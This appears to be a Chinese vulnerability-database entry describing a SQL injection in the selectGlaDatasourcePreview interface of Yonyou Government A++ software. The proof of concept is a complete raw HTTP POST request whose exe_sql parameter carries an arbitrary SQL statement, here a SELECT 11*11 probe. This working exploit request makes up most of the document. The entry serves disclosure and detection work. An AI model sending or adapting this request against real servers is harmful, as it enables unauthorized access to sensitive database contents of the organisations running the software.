用友政务 A++ selectGlaDatasourcePreview SQL注入漏洞

日期: 2023-10-16 | 影响软件: 用友政务A++ | POC: 已公开

漏洞描述

用友政务 A++ selectGlaDatasourcePreview 接口存在SQL注入漏洞，攻击者利用此漏洞可以获取数据库敏感信息。

PoC代码

POST /gla/dataSource/selectGlaDatasourcePreview HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 72
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

exe_sql=SELECT%2011*11&pageNumber=1&pageSize=10&exe_param=11,1,11,1,11,1

相关漏洞推荐